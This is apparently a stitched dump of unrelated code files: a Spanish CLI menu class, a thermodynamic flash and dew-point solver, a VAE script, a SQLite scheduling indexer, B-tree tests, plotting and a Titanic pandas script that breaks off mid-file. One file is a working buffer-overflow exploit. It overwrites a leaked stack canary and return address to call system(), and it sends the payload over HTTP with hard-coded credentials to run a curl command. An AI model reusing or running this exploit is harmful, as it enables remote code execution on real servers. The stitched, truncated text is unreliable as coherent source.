El objetivo es minimizar la programacion de la impresion de menus en cli
la vista que herede debe agregar una variable llamada menu
que debe ser un diccionario con el siguiente formato:
menu = {
<id de la opcion del menu> : ("<Nombre de la opcion>", <otro diccionario
del mismo formato o una funcion que resuelva>)
}
ejemplo:
menu = {
1: ("OPCION 1": {
1: ("SUBMENU 1.1" , {
1: ("ACCION 1.1.1", funcion1),
2: ("ACCION 1.1.2", funcion2)
}) }),
2 : ("OPCION 2": {
1: ("SUBMENU 2.1" , {
1: ("ACCION 2.1.1", funcion3),
2: ("ACCION 2.1.2", funcion4)
}),
2: ("SUBMENU 2.2" , {
1: ("ACCION 2.2.1", funcion5),
2: ("ACCION 2.2.2", funcion6)
}) ,
3: ("SALIR" , sys.exit)
})
}
NOTAS:
* Se debe evitar sobreescribir el metodo __init__ puesto que a partir de este
se genera las acciones para mostrar menus. En cualquier caso, si se necesita
sobreescribir el metodo __init__ debera llamarse al finalizar la funcion sobreescrita
con super.__init__().
* Por ningun motivo sobreescribir el metodo __print
"""
import sys
# Python 2 compatibility: alias raw_input to input so the rest of the
# module reads user choices through input() uniformly.
if sys.version[0]=='2':
    input = raw_input
# Convenience aliases (Spanish names): entrada reads input, salir exits.
entrada = input
salir = sys.exit
from types import FunctionType as funct
class VistaBase:
    """Base CLI view that renders nested menus described by `menu`.

    Subclasses override `menu` (format documented in the module docstring:
    option number -> (label, submenu dict or zero-argument callable)).
    Instantiating the subclass immediately enters the menu loop.
    """
    # Mapping of option number -> (label, submenu-dict-or-callable).
    menu = {}
    def __init__(self):
        self.__print()
    def __print(self, __menu=None, __key=None):
        # Recursive menu driver:
        #   __menu is None -> restart from the top-level menu
        #   __key  is None -> display __menu, read a choice, recurse with it
        #   otherwise      -> resolve the chosen entry (submenu or action)
        if __menu is None:
            self.__print(self.menu, __key)
        elif __key is None:
            for k in __menu:
                print("[%d] %s"%(k,__menu[k][0]))
            # NOTE(review): non-numeric input makes int() raise ValueError
            # here — unhandled.
            opt = int(input('Seleccione opcion: '))
            if opt not in __menu:
                print("Error en opcion digitada")
                # invalid choice: redisplay the same menu
                self.__print(__menu, __key)
            else:
                self.__print(__menu, opt)
        else:
            value = __menu[__key][1]
            if type(value) is dict:
                self.__print(value)
            elif type(value) is funct:
                # run the action, then return to the top-level menu
                value()
                self.__print()
if __name__=="__main__":
    # Demo: a two-level menu wired to a dummy action (f1) and exit (s).
    def f1():
        print("REALIZANDO OPERACIONES....")
    def s():
        sys.exit()
    class EjemploVista(VistaBase):
        menu = {
            1: ("EJEMPLO 1", {
                1: ("EJEMPLO SUB MENU 1", f1),
                2: ("SALIR", s)
            }),
            2: ("SALIR", s)
        }
    # Instantiation starts the interactive loop immediately.
    EjemploVista()
|
15,168 | da7616c6806299f2f0542af6bb056f9b0e8275dc | from ..helpers import eos
from ..helpers import alfaFunctions
from ..helpers.eosHelpers import A_fun, B_fun, getCubicCoefficients, getMixFugacity,getMixFugacityCoef, dAdT_fun
from ..solvers.cubicSolver import cubic_solver
from ..helpers import temperatureCorrelations as tempCorr
from ..helpers import mixing_rules
from numpy import log, exp, sqrt,absolute, array,sum
from scipy.optimize import fsolve, newton, root
from scipy.integrate import quad
def solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals',diagram=False,properties=False,heat_capacities=None):
    """Solve the cubic EOS for both phases at (t, p).

    Returns (liq_fugacity_coef, vap_fugacity_coef) by default, or a dict of
    fugacities/enthalpies/entropies/compressibilities when properties=True
    (heat_capacities must then be supplied).
    """
    # Vectorization
    tc = array(tc)
    pc= array(pc)
    acentric = array(acentric)
    liq_compositions=array(liq_compositions)
    vap_compositions = array(vap_compositions)
    kij = array(kij)
    # Method selection
    eos_fun = eos.selector(method)
    u,w,omega_a,omega_b,L = eos_fun()
    # Alfa function selection
    alfa_fun = alfaFunctions.selector(alfa_function)
    alfa= alfa_fun(t,tc,acentric)
    # Per-component dimensionless A and B parameters
    Ai = A_fun(t,p,tc,pc,acentric,omega_a,alfa)
    Bi = B_fun(t,p,tc,pc,omega_b)
    # Mixing rules
    mixing_rule_used = mixing_rules.selector(mixing_rule)
    A_liq,B_liq,A_i_liq,Aij_liq,dAdT_liq = mixing_rule_used(liq_compositions,tc,acentric,kij,Ai,Bi,alfa,alfa_fun,t)
    A_vap,B_vap,A_i_vap,Aij_vap,dAdT_vap = mixing_rule_used(vap_compositions,tc,acentric,kij,Ai,Bi,alfa,alfa_fun,t)
    coefficients_liq = getCubicCoefficients(A_liq,B_liq,u,w)
    coefficients_vap = getCubicCoefficients(A_vap,B_vap,u,w)
    z_liq= cubic_solver(coefficients_liq,diagram,B_liq)
    z_vap = cubic_solver(coefficients_vap,diagram,B_vap)
    # When the solver returns several roots, index 0 is used for the liquid
    # and index 1 for the vapour — presumably ordered by the solver; confirm.
    z_liq = z_liq[0] if isinstance(z_liq,tuple) else z_liq
    z_vap = z_vap[1] if isinstance(z_vap,tuple) else z_vap
    liq_fugacity_coef = getMixFugacityCoef(z_liq,A_liq,B_liq,A_i_liq,Bi,L)
    vap_fugacity_coef = getMixFugacityCoef(z_vap,A_vap,B_vap,A_i_vap,Bi,L)
    if(properties):
        # NOTE(review): these calls pass the mixture B (B_liq/B_vap) in the
        # position where getMixFugacityCoef above receives the component Bi —
        # verify against the helper's signature.
        liq_fugacity = getMixFugacity(z_liq,A_liq,B_liq,A_i_liq,B_liq,L,liq_compositions,p)
        vap_fugacity = getMixFugacity(z_vap,A_vap,B_vap,A_i_vap,B_vap,L,vap_compositions,p)
        heat_capacities = array(heat_capacities)
        ideal_enthalpies = get_ideal_enthalpy(heat_capacities,t)
        ideal_entropies = get_ideal_entropy(heat_capacities,t,p)
        dAdt = dAdT_fun(t,p,tc,pc,acentric,omega_a,alfa_fun)
        enthalpy_liq = get_real_enthalpy(ideal_enthalpies,t,z_liq,A_liq,dAdt,B_liq,L)
        enthalpy_vap = get_real_enthalpy(ideal_enthalpies,t,z_vap,A_vap,dAdt,B_vap,L)
        entropy_liq = get_real_entropy(ideal_entropies,z_liq,A_liq,dAdt,B_liq,L)
        entropy_vap = get_real_entropy(ideal_entropies,z_vap,A_vap,dAdt,B_vap,L)
        response = {
            "liq_fugacity":liq_fugacity,
            "vap_fugacity":vap_fugacity,
            "enthalpy_liq":enthalpy_liq,
            "enthalpy_vap":enthalpy_vap,
            "entropy_liq":entropy_liq,
            "entropy_vap":entropy_vap,
            "z_liq":z_liq,
            "z_vap":z_vap,
            "liq_compositions":liq_compositions,
            "vap_compositions":vap_compositions
        }
        return response
    return (liq_fugacity_coef,vap_fugacity_coef)
def bubble_temperature(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_t=0.1,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
    """Bubble-point temperature at fixed pressure p (secant on log sum(K*x)).

    Iterates K-values from the EOS and a secant temperature update until
    |log(sum(Ki*xi))| < 1e-9.  Returns (T, p, x, y) on success, or the
    string 'Problem can not be solved' after 500 iterations.
    """
    liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
    Ki = liq_fugacity_coef/vap_fugacity_coef
    Sy = sum(Ki*liq_compositions)
    # convergence criterion: E = ln(sum Ki*xi) -> 0 at the bubble point
    E = log(Sy)
    attempts=0
    new_t=t
    new_vap_compositions = vap_compositions
    while(absolute(E) >= 1e-9):
        if(attempts == 500):
            return 'Problem can not be solved'
        # perturbed temperature for the secant slope
        t0 = new_t + delta_t
        liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t0,p,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
        Sy0 = sum(Ki0*liq_compositions)
        E0 = log(Sy0)
        # secant-style temperature update
        new_t = (new_t*t0*(E0-E))/(t0*E0-new_t*E)
        Sy = sum(Ki*liq_compositions)
        # normalise the vapour composition from the current K-values
        new_vap_compositions = (Ki*liq_compositions)/Sy
        liq_fugacity_coef,vap_fugacity_coef = solve_eos(new_t,p,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki = liq_fugacity_coef/vap_fugacity_coef
        Sy = sum(Ki*liq_compositions)
        E=log(Sy)
        attempts +=1
    return(new_t,p,liq_compositions,new_vap_compositions)
def bubble_pressure(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_p=0.001,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
    """Bubble-point pressure at fixed temperature t (secant on sum(K*x)-1).

    Same scheme as bubble_temperature but perturbs pressure by a relative
    delta_p.  Returns (t, P, x, y) on success, or the string
    'Problem can not be solved' after 500 iterations.
    """
    liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
    Ki = liq_fugacity_coef/vap_fugacity_coef
    Sy = sum(Ki*liq_compositions)
    # convergence criterion: E = sum(Ki*xi) - 1 -> 0 at the bubble point
    E = Sy -1
    attempts=0
    new_p=p
    new_vap_compositions = vap_compositions
    while(absolute(E) >= 1e-9):
        if(attempts == 500):
            return 'Problem can not be solved'
        # relative pressure perturbation for the secant slope
        p0=new_p*(1+delta_p)
        liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t,p0,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
        Sy0 = sum(Ki0*liq_compositions)
        E0=Sy0-1
        # secant-style pressure update
        new_p = (new_p*p0*(E0-E))/(p0*E0-new_p*E)
        Sy = sum(Ki*liq_compositions)
        new_vap_compositions = (Ki*liq_compositions)/Sy
        liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,new_p,tc,pc,acentric,liq_compositions,new_vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki = liq_fugacity_coef/vap_fugacity_coef
        Sy = sum(Ki*liq_compositions)
        E = Sy -1
        attempts +=1
    return(t,new_p,liq_compositions,new_vap_compositions)
def dew_temperature(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_t=0.1,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
    """Dew-point temperature at fixed pressure p (secant on log sum(y/K)).

    Mirror of bubble_temperature with the liquid composition as the unknown.
    Returns (T, p, x, y) on success, or 'Problem can not be solved'.
    """
    liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
    Ki = liq_fugacity_coef/vap_fugacity_coef
    Sx = sum(vap_compositions/Ki)
    # convergence criterion: E = ln(sum yi/Ki) -> 0 at the dew point
    E = log(Sx)
    attempts=0
    new_t=t
    new_liq_compositions = liq_compositions
    while(absolute(E) >= 1e-9):
        if(attempts == 500):
            return 'Problem can not be solved'
        # perturbed temperature for the secant slope
        t0 = new_t + delta_t
        liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t0,p,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
        Sx0 = sum(vap_compositions/Ki0)
        E0 = log(Sx0)
        # secant-style temperature update
        new_t = (new_t*t0*(E0-E))/(t0*E0-new_t*E)
        Sx = sum(vap_compositions/Ki)
        # normalise the liquid composition from the current K-values
        new_liq_compositions = vap_compositions/(Ki*Sx)
        liq_fugacity_coef,vap_fugacity_coef = solve_eos(new_t,p,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki = liq_fugacity_coef/vap_fugacity_coef
        Sx = sum(vap_compositions/Ki)
        E = log(Sx)
        attempts +=1
    return(new_t,p,new_liq_compositions,vap_compositions)
def dew_pressure(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,delta_p=0.001,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
    """Dew-point pressure at fixed temperature t (secant on sum(y/K)-1).

    Mirror of bubble_pressure with the liquid composition as the unknown.
    Returns (t, P, x, y) on success, or 'Problem can not be solved'.
    """
    liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
    Ki = liq_fugacity_coef/vap_fugacity_coef
    Sx = sum(vap_compositions/Ki)
    # convergence criterion: E = sum(yi/Ki) - 1 -> 0 at the dew point
    E = Sx -1
    attempts=0
    new_p=p
    new_liq_compositions = liq_compositions
    while(absolute(E) >= 1e-9):
        if(attempts == 500):
            return 'Problem can not be solved'
        # relative pressure perturbation for the secant slope
        p0=new_p*(1+delta_p)
        liq_fugacity_coef0,vap_fugacity_coef0 = solve_eos(t,p0,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki0 = liq_fugacity_coef0/vap_fugacity_coef0
        Sx0 = sum(vap_compositions/Ki0)
        E0=Sx0-1
        # secant-style pressure update
        new_p = (new_p*p0*(E0-E))/(p0*E0-new_p*E)
        Sx = sum(vap_compositions/Ki)
        new_liq_compositions = vap_compositions/(Ki*Sx)
        liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,new_p,tc,pc,acentric,new_liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki = liq_fugacity_coef/vap_fugacity_coef
        Sx = sum(vap_compositions/Ki)
        E = Sx -1
        attempts +=1
    return(t,new_p,new_liq_compositions,vap_compositions)
def flash(t,p,tc,pc,acentric,feed_compositions,liq_compositions,vap_compositions,v_f,kij,delta_p=0.0001,method='pr',alfa_function='alfa_peng_robinson',mixing_rule='van_der_waals'):
    """Isothermal flash: split the feed at (t, p) into liquid and vapour.

    Rachford-Rice style Newton update on the vapour fraction v_f, iterated
    with EOS K-values until the phase-equilibrium residual tau < 1e-5.
    Returns (t, p, z_feed, x, y, v_f).
    """
    tau=1
    while(absolute(tau)> 1e-5):
        liq_fugacity_coef,vap_fugacity_coef = solve_eos(t,p,tc,pc,acentric,liq_compositions,vap_compositions,kij,method,alfa_function,mixing_rule)
        Ki = liq_fugacity_coef/vap_fugacity_coef
        # Rachford-Rice residual S and its derivative S0 w.r.t. v_f
        S = sum((feed_compositions*(Ki-1))/(1+(v_f*(Ki-1))))
        S0 = sum((-feed_compositions*(Ki-1)**2)/(1+v_f*(Ki-1))**2)
        # Newton step on the vapour fraction
        v_f = v_f-(S/S0)
        liq_compositions0 = feed_compositions/(1+v_f*(Ki-1))
        Sx=sum(liq_compositions0)
        liq_compositions = liq_compositions0/Sx
        vap_compositions0=liq_compositions0*Ki
        Sy=sum(vap_compositions0)
        vap_compositions=vap_compositions0/Sy
        # equilibrium check: x_i*phi_liq == y_i*phi_vap at the solution
        tau=sum(absolute(liq_compositions*liq_fugacity_coef-vap_compositions*vap_fugacity_coef))
    return (t,p,feed_compositions,liq_compositions,vap_compositions,v_f)
def get_ideal_enthalpy(heat_capacities,t):
    """Integrate each ideal-gas Cp correlation from 298 K to t.

    heat_capacities holds (correlation_number, constants) pairs; the
    correlation is resolved through tempCorr.selector.
    """
    ideal_enthalpies = []
    for correlation_id, constants in heat_capacities:
        cp_equation = tempCorr.selector(correlation_id)
        # quad returns (value, abs_error); only the value is kept
        enthalpy_value, _ = quad(cp_equation, 298, t, args=(constants,))
        ideal_enthalpies.append(enthalpy_value)
    return array(ideal_enthalpies)
def get_ideal_entropy(heat_capacities,t,p):
    """Ideal-gas entropy change from (298 K, 1) to (t, p) per component.

    Integrates Cp/T from 298 K to t and subtracts the R*ln(p) pressure term.
    """
    R = 8.314
    ideal_entropies = []
    for correlation_id, constants in heat_capacities:
        cp_over_t = lambda temp, c: tempCorr.selector(correlation_id)(temp, c) / temp
        integral_value, _ = quad(cp_over_t, 298, t, args=(constants,))
        ideal_entropies.append(integral_value - R * log(p))
    return array(ideal_entropies)
def get_real_enthalpy(ideal_enthalpies,t,z,A,dAdt,B,L):
    """Add the EOS enthalpy-departure term to the ideal-gas enthalpies.

    L is the EOS-specific logarithmic term, a callable of (z, B).
    """
    R = 8.314
    departure = R * t * (z - 1 + ((dAdt - A) / B) * L(z, B))
    return ideal_enthalpies + departure
def get_real_entropy(ideal_entropies,z,A,dAdt,B,L):
    """Add the EOS entropy-departure term to the ideal-gas entropies.

    L is the EOS-specific logarithmic term, a callable of (z, B).
    """
    R = 8.314
    departure = R * (log(z - B) + (dAdt / B) * L(z, B))
    return ideal_entropies + departure
|
15,169 | c75c77d5731d41f6ceac442470954406928e0986 | #!/bin/python3
import numpy as np
import random
import os
import matplotlib.pyplot as plt
from scipy.stats import norm
from copy import deepcopy
import tensorflow as tf
np.set_printoptions(precision=4, edgeitems=6, linewidth=100, suppress=True)
from vae import ConvVAE, reset_graph
# Load one recorded gameplay frame and encode it with a small ConvVAE.
DATA_DIR = '/N/u/mhaghir/Carbonate/CogIA_project/CIAIP/VAE/Data'
filelist = os.listdir(DATA_DIR)
filelist.sort()
# skip the first 195 episode files
filelist = filelist[195:]
data = np.load(DATA_DIR + '/' + filelist[1])
game_frames = data['obs']
# normalise uint8 pixels to [0, 1]
game_frames = game_frames.astype(np.float32)/255.0
# frame = random.choice(frames).reshape(1, 64, 64, 3)
frame = game_frames[5].reshape(1, 64, 64, 3)
# fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (6, 6))
# ax.imshow(frame[0])
# fig.savefig('frame.pdf')
# plt.close()
# 2-dimensional latent space, single-frame inference on CPU
z_size = 2
model_path_name = '/N/u/mhaghir/Carbonate/CogIA_project/CIAIP/VAE/vae'
vae = ConvVAE(z_size=z_size,
              batch_size=1,
              is_training=False,
              reuse=False,
              gpu_mode=False)
# vae.load_json(os.path.join(model_path_name, 'vae_self_10_zsize_2.json'))
# NOTE(review): load_json is commented out, so encode() below runs with
# freshly initialised (untrained) weights — confirm this is intentional.
batch_z = vae.encode(frame[:, 0:52, :])
# mu, logvar = vae.encode_mu_logvar(frame)
# fig, axs = plt.subplots(nrows = 8, ncols = 4, figsize = (14, 15))
# axs = axs.ravel()
# for i in range(32):
# # z_copy = deepcopy(batch_z)
# # z_copy[0, i] == 0
# z_copy = np.expand_dims(np.random.random_sample((2,)), 0)
# axs[i].imshow(np.squeeze(vae.decode(z_copy)))
# # axs[i].legend( 'dim_{}'.format(i), loc='lower right')
# # axs[i].set_ylim(0.8,1)
# fig.savefig('z_explore.pdf')
# plt.close()
# reconstruct = vae.decode(batch_z)
# fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (6, 6))
# ax.imshow(reconstruct[0])
# fig.savefig('rec_frame.pdf')
# plt.close()
# model_params, model_shapes, model_names = vae.get_model_params()
# for param in zip(model_snames, model_shapes):
# print(param[0], ': ', param[1])
# print('\n')
# Dump the shape of every intermediate activation of the encoder/decoder
# for the cropped (top 52 rows) input frame.
h, h1, h2, h3, h4, h5, h6, h7, h8, h9, y = vae.hidden(frame[:, 0:52, :])
print("h: ", np.shape(h))
print("h1: ", np.shape(h1))
print("h2: ", np.shape(h2))
print("h3: ", np.shape(h3))
print("h4: ", np.shape(h4))
print("h5: ", np.shape(h5))
print("h6: ", np.shape(h6))
print("h7: ", np.shape(h7))
print("h8: ", np.shape(h8))
print("h9: ", np.shape(h9))
print("y: ", np.shape(y))
|
15,170 | ba5d83903aa587a0e1b0e5bb7b6e40035185c551 | import sqlite3
from time import time
def PrepareIndex(db):
    """Build room-availability lookup tables from the `schedule` table.

    Creates (replacing any previous run): text_index (free-text search
    helper), I (48 half-hour intervals between 08:00 and 20:00), R
    (physical north-campus rooms), days (weekdays present), O (occupied
    room/interval pairs) and F (free room/interval pairs).
    Commits on the given sqlite3 connection.
    """
    c = db.cursor()
    # Drop leftovers from a previous run; a missing table/index is expected,
    # so only sqlite errors are swallowed (the original bare `except:` also
    # hid KeyboardInterrupt and programming errors).
    for t in "I R days O F text_index".split():
        try:
            c.execute('drop table %s' % t)
        except sqlite3.Error:
            pass
        try:
            c.execute('drop index I_%s' % t)
        except sqlite3.Error:
            pass
    #
    # Create text index (sort of...): one concatenated searchable string T
    # per schedule row.  (SQL built with %-formatting uses internal
    # constants only — no external input reaches these statements.)
    #
    c.execute('''
    CREATE TABLE text_index AS
    select semester,
           code,
           title,
           replace(code, ' ', '') || ' ' || title || ' ' || room || ' ' || instructor || ' ' || schtype as T
    from schedule
    ''')
    #
    # Create all half-hour intervals from 08:00 to 20:00 (24 rows).
    #
    start = time()
    c.execute("""
    CREATE TABLE IF NOT EXISTS I(
        i integer not null primary key,
        starthour integer,
        startmin integer,
        endhour integer,
        endmin integer)
    """)
    i = 0
    for starthour in range(8, 20):
        for startmin in (0, 30):
            # an interval starting at X:30 ends at (X+1):00
            endhour = starthour if startmin == 0 else starthour+1
            endmin = 0 if startmin == 30 else 30
            c.execute('insert into I values (?,?,?,?,?)',
                      (i, starthour, startmin, endhour, endmin))
            i += 1
    db.commit()
    print("I: %.2f seconds" % (time() - start))
    #
    # Create all physical rooms in the north campus (excluding virtual/TBA).
    #
    start = time()
    c.execute('''
    create table if not exists R AS
    select room, campus,
           count (distinct substr(code, 1, 4)) as flex,
           max(capacity) as capacity
    from schedule
    where (room not like 'Virtual%'
           and room != 'TBA'
           and room != '61%'
           and campus like '%north%')
    group by room, campus
    ''')
    c.execute('''
    create table if not exists days as
    select distinct weekday
    from schedule
    where weekday in ('M', 'T', 'W', 'R', 'F')
    ''')
    print("R: %.2f seconds" % (time() - start))
    #
    # Create all occupied (room, weekday, interval) combinations.
    #
    def overlap(x0, y0, x1, y1):
        # SQL predicate: intervals [x0,y0) and [x1,y1) overlap
        return "not (%(y0)s <= %(x1)s or %(y1)s <= %(x0)s)" % dict(
            x0=x0, y0=y0, x1=x1, y1=y1)
    start = time()
    c.execute('''
    create table if not exists O as
    select code, room, weekday, i, semester
    from schedule S join I
    on %(overlap)s
    ''' % dict(overlap=overlap(
        "S.starthour*60 + S.startmin",
        "S.endhour *60 + S.endmin",
        "I.starthour*60 + I.startmin",
        "I.endhour *60 + I.endmin")))
    c.execute("create index I_O on O(room, weekday, i)")
    db.commit()
    print("O: %.2f seconds" % (time() - start))
    #
    # Create all free intervals: every (semester, room, weekday, interval)
    # combination, left-joined with O so occupied slots carry a course code.
    #
    start = time()
    c.execute('''
    create table if not exists F as
    select T.semester, R.room, days.weekday, I.i, O.code
    from (select distinct semester from schedule) T,
         R,
         days,
         I
    left join O
         on T.semester = O.semester
         and R.room = O.room
         and days.weekday = O.weekday
         and I.i = O.i
    ''')
    print("F: %.2f seconds" % (time() - start))
    db.commit()
if __name__ == '__main__':
    # CLI entry point: `python prepare_index.py <db-file>` rebuilds the
    # availability tables inside that sqlite database.
    import sys
    dbname = sys.argv[1]
    db = sqlite3.connect(dbname)
    PrepareIndex(db)
    db.close()
|
15,171 | ea756c99f83a9ffbac914c9cf312b32231382162 | import random
import pickle
import unittest
from btree import *
class BTreeTests(unittest.TestCase):
    """Exercises insertion, bulk loading and removal on BTree."""

    def test_additions(self):
        tree = BTree(20)
        expected = list(range(2000))
        for position, value in enumerate(expected):
            tree.insert(value)
            # the tree's iteration order must match the sorted prefix so far
            self.assertEqual(list(tree), expected[:position + 1])

    def test_bulkloads(self):
        tree = BTree.bulkload(list(range(2000)), 20)
        self.assertEqual(list(tree), list(range(2000)))

    def test_removals(self):
        tree = BTree(20)
        remaining = list(range(2000))
        for value in remaining:
            tree.insert(value)
        removal_order = remaining[:]
        random.shuffle(removal_order)
        # remove every element in random order, checking the contents
        # before and after each removal
        while remaining:
            self.assertEqual(list(tree), remaining)
            victim = removal_order.pop()
            remaining.remove(victim)
            tree.remove(victim)
            self.assertEqual(list(tree), remaining)

    def test_insert_regression(self):
        # stress test: many duplicate inserts into a bulk-loaded tree
        tree = BTree.bulkload(list(range(2000)), 50)
        for _ in range(100000):
            tree.insert(random.randrange(2000))
class BPlusTreeTests(unittest.TestCase):
    """Exercises key/value behaviour of BPlusTree."""

    # A reason string is passed to unittest.skip: applying it bare
    # (`@unittest.skip`) is only supported from Python 3.11 on and silently
    # misbehaves on older interpreters.
    @unittest.skip("demonstration only: prints serialized items, asserts nothing")
    def testSerialization(self):
        bt = BPlusTree(20)
        bt.insert(1, 'one')
        bt.insert(1, 'uno')
        bt.insert(1, 'raz')
        bt.insert(2, 'two')
        bt.insert(2, 'duo')
        bt.insert(2, 'dva')
        bt.insert(3, 'three')
        bt.insert(3, 'tres')
        bt.insert(3, 'tri')
        ser = pickle.dumps(bt)
        bt2 = pickle.loads(ser)
        for v in bt2.items():
            print(v)

    @unittest.skip("demonstration only: prints remaining values, asserts nothing")
    def testMultipleAddition(self):
        bt = BPlusTree(20)
        bt.insert(1, 'one')
        bt.insert(1, 'uno')
        bt.insert(1, 'raz')
        bt.insert(2, 'two')
        bt.insert(2, 'duo')
        bt.insert(2, 'dva')
        bt.insert(3, 'three')
        bt.insert(3, 'tres')
        bt.insert(3, 'tri')
        bt.remove(2)
        for v in bt.getlist(2):
            print(v)

    def test_additions_sorted(self):
        # keys inserted in ascending order must be retrievable and iterate sorted
        bt = BPlusTree(20)
        l = list(range(2000))
        for item in l:
            bt.insert(item, str(item))
        for item in l:
            self.assertEqual(str(item), bt[item])
        self.assertEqual(l, list(bt))

    def test_additions_random(self):
        # same contract when keys arrive in random order
        bt = BPlusTree(20)
        l = list(range(2000))
        random.shuffle(l)
        for item in l:
            bt.insert(item, str(item))
        for item in l:
            self.assertEqual(str(item), bt[item])
        self.assertEqual(list(range(2000)), list(bt))

    def test_bulkload(self):
        # bulkload must preserve both key order and key->value pairing
        bt = BPlusTree.bulkload(list(zip(list(range(2000)), list(map(str, list(range(2000)))))), 20)
        self.assertEqual(list(bt), list(range(2000)))
        self.assertEqual(
            list(bt.items()),
            list(zip(list(range(2000)), list(map(str, list(range(2000)))))))
if __name__ == '__main__':
    # Discover and run every TestCase in this module.
    unittest.main()
|
15,172 | 6f25350b1f18fe2bbd2a1a6f5b6c6c2465ec73a0 | import socket
import time
import base64
from sys import argv
import struct
# Stack-overflow PoC: builds an HTTP POST whose body overwrites the stack
# canary, the saved return address (redirected to system) and a pointer to
# an attacker-controlled command string.  argv[1..3] supply the leaked
# canary, check_auth address and stack address as hex strings.
canary = struct.pack('<L', int(argv[1], base=16))
ret_addr = struct.pack('<L', int(argv[2], base=16) - int("0x2d437", base=16))
# check_auth + 0x2d437 = system
string_pointer = struct.pack('<L', int(argv[3], base=16) - int("0x90", base=16))
# string_pointer = ebp - 0x94
body=""
tmp = "a" * 100 #total 100 chars
# NOTE(review): mixing str and bytes below (body is str, canary is bytes)
# only works on Python 2 — on Python 3 these += lines raise TypeError.
body+=str.encode(tmp)
body+=canary #write canary
tmp = "a" * 12 # go to return address
body+=str.encode(tmp)
body+=ret_addr # overide with system
tmp = "a" * 4 # cause of system call
body+=str.encode(tmp)
body+=string_pointer
# NUL-terminated shell command executed by system()
body+="curl ifconfig.me > /tmp/aabb.log\x00"
# %27$p %28$p %30$p
s = socket.socket()
s.connect(('127.0.0.1',8000))
# raw HTTP request with a hard-coded Basic-auth header
send="POST /ultimate.html HTTP/1.1\r\n"
send+="Host: localhost:8000\r\n"
send+="Authorization: Basic YWRtaW46eW91IHNoYWxsIG5vdCBwYXNz\r\n"
send+="Content-Type: application/octet-stream\r\n\r\n"
send+=body
s.send(send)
time.sleep(1)
#r = s.recv(2000)
#print r
|
15,173 | 478c3b9c9d374bdcf9b9ca6302aff42ba3cfe555 |
import numpy as np
import matplotlib.pyplot as plt
# Radii sampled from 0 to 6 in steps of 0.01.
r = np.arange(0, 6.0, 0.01)
################################################
def function(r):
    """Spiral angle: theta grows linearly with radius r (two full turns per unit)."""
    return 4 * np.pi * r
###################################################
# Polar axes: plot the spiral theta(r) against r.
ax = plt.subplot(111, polar=True)
ax.plot(function(r), r, color='r', linewidth=2)
# clip the visible radius at 2 even though r runs to 6
ax.set_rmax(2.0)
ax.grid(True)
ax.set_title("A line plot on a polar axis", va='bottom')
plt.show()
|
15,174 | fb5b39f543a8fb442c7fef22abe66941e3b25385 | from mara_db import config, views, cli
# Mara plugin registration: these module-level lists are discovered by the
# mara framework to wire up config, navigation, ACL, Flask and CLI pieces.
MARA_CONFIG_MODULES = [config]
MARA_NAVIGATION_ENTRY_FNS = [views.navigation_entry]
MARA_ACL_RESOURCES = [views.acl_resource]
MARA_FLASK_BLUEPRINTS = [views.blueprint]
MARA_CLICK_COMMANDS = [cli.migrate]
|
15,175 | ada61061be2d7270b7b4107d04053f21859417df | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0)   # read the file w/header row #0
# drop text / high-cardinality columns the models can't use directly
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
    """Map a 'male'/'female' string to its numeric encoding (0/1).

    Raises KeyError for any other value, like the original lookup.
    """
    return {'male': 0, 'female': 1}[s]
df['sex'] = df['sex'].map(tr_mf)  # apply the function to the column
df.head()   # first five lines (result discarded; only useful in a REPL)
df.info()   # column details (prints to stdout)
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
